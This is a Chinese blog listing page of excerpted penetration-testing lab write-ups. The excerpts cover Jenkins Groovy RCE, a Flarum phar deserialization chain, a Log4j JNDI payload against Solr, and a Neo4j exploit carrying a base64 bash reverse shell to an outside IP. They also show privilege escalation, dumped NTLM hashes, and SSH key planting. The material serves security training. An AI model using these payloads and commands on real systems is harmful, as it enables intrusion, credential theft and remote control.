flag01在 80 端口的 wp 下面有个 www.zip。 tools/content-log.php 下面有个文件读取。 权限很高,能直接读到 flag。应该是 xp 起的 flag028080 下面有个 jenkins,读取 jenkins 的密码: 1C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword 510235cf43f14e83b88a9f144199655b 然后 admin:510235cf43f14e83b88a9f144199655b登录。 我记得这里之前打 ciscn 决赛的时候遇到过,当时直接走 pipeline CI 这种格式 rce 的。这里又看了一眼别人的方法,在/manage/script下面用 groovy 的语法实现 RCE: 1println("whoami".execute().text) 12println("net user natro92 123qwe!@# /add".execute().text)println(& ...
flag01外网有一个 ftp 里面有个 pom.xml 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> ...
flag01 从偶遇 Flarum 开始的 RCE 之旅 上来是个爆破,administrator:1chris P 牛这个洞就是@import引入伪协议,将结果写入 css,再data-uri('phar://./assets/forum.css')触发 phar 反序列化。 先打开 phar 写入权限: 找到 php.ini: 1php -r "phpinfo();" 修改:phar.readonly = Off 然后直接用 phpgcc 生成 phar 包: 1php phpggc -p tar -b Monolog/RCE6 system "curl xx|sh" 然后直接在其中用 data 的 base64 协议引用: 1@import (inline) 'data:text/css;base64,dxxxxAAAAAAA......'; 主页查看 css 发现已经可以控制,然后加载 phar 反序列化。 123.test { content: data-uri("p ...
flag01扫下有 8983 端口。 有 solr 服务,第一个想到的肯定是 log4j 1http://39.98.126.194:8983/solr/admin/collections?action=${jndi:ldap://5lpj8t5l.eyes.sh} GitHub - k4i-x3i0/jndiExploit-beta: 魔改版,实现冰蝎直连内存马,无需修改冰蝎客户端 1java -jar JNDIExploit-beta.jar -i xxx 1http://xxxx:8983/solr/admin/collections?action=${jndi:ldap://8.129.237.128:1389/Basic/ReverseShell/xxx/8083} sudo -l 提权 flag02扫下 1./fscan -h 172.22.9.19/24 -eh 172.22.9.19 1234567891011121314151617181920212223242526272829303132333 ...
flag01扫下目标 ip 1337 端口是一个 neo4j,有 nday 直接打: GitHub - zwjjustdoit/CVE-2021-34371.jar: CVE-2021-34371.jar 直接弹 shell 1java -jar .\rhino_gadget.jar rmi://39.99.136.242:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU5LjE0OC42OC84MDgzIDA+JjE=}|{base64,-d}|{bash,-i}" flag02fscan 扫下 123456789101112131415161718192021222324252627282930[2025-03-12 15:39:45] [HOST] 目标:172.22.6.12 状态:alive 详情:protocol=ICMP[2025-03-12 15:39:48] [HOST] 目标:172.22.6.25 状态:a ...
会员日半价捏,打过十二点了艹了还没用上原价,为什么半价打过十二点之后所有的都按原价算 。。好贵啊我日 flag01上来俩 ip: 123439.98.124.24439.99.147.240 123456789101112131415161718192021222324252627282930313233343536373839404142[2025-03-10 19:37:38] [INFO] 暴力破解线程数: 1[2025-03-10 19:37:38] [INFO] 开始信息扫描[2025-03-10 19:37:38] [INFO] 最终有效主机数量: 1[2025-03-10 19:37:38] [INFO] 开始主机扫描[2025-03-10 19:37:38] [INFO] 有效端口数量: 233[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:80[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:22[2025-03-10 19:37:38] [SUCCESS] 服 ...
flag01TP5.0.23 RCE 权限低,先看 suid:FFFF 1find / -user root -perm -4000 -print 2> result.txt 没有熟悉的,看看 sudo -l 有 mysql flag{60b53231- fscan 一下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647[2025-03-10 17:44:52] [HOST] 目标:172.22.1.15 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.2 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.21 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.18 状态:alive 详情:p ...
flag01123456789101112131415161718192021[2025-03-09 20:26:33] [INFO] 暴力破解线程数: 1[2025-03-09 20:26:33] [INFO] 开始信息扫描[2025-03-09 20:26:33] [INFO] 最终有效主机数量: 1[2025-03-09 20:26:33] [INFO] 开始主机扫描[2025-03-09 20:26:34] [INFO] 有效端口数量: 233[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:6379[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:21[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:80[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:22[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:21 => [ft ...
flag01fscan 扫一下。直接能扫到 1433 端口的密码: 1sa 1qaz!QAZ 命令直接上线就好了。 但是权限太低了。 sweetpotato 提权给 cs 上线: flag02看 flag 的时候发现还有个 john 用户。 1logonpasswords 没有明文密码,拿到 john 的 hash。 1234Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027::: 查 ...
打个简单的。 flag01actuator 泄露,里面有 key。 8080 上有 shiro 上哥斯拉 🐎。 权限不够,尝试 suid 提权。 1find / -perm -u=s -type f 2>/dev/null 只有 vim.basic 能用。 这里写个公钥获取 root 权限:ssh-keygen -t rsa 生成一对公私钥一路回车。 1vim.basic /root/.ssh/authorized_keys 写公钥没那么多要求,但是写私钥注意这个内容一定要整理好格式,不然会无法识别。 flag021fscan -h 172.30.12.5/24 -eh 172.30.12.5 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253[2025-03-07 20:47:42] [INFO] 暴力破解线程数: 1[2025-03-07 20:47:42] [INFO] 开始信息扫描[2025-03-07 20:47: ...
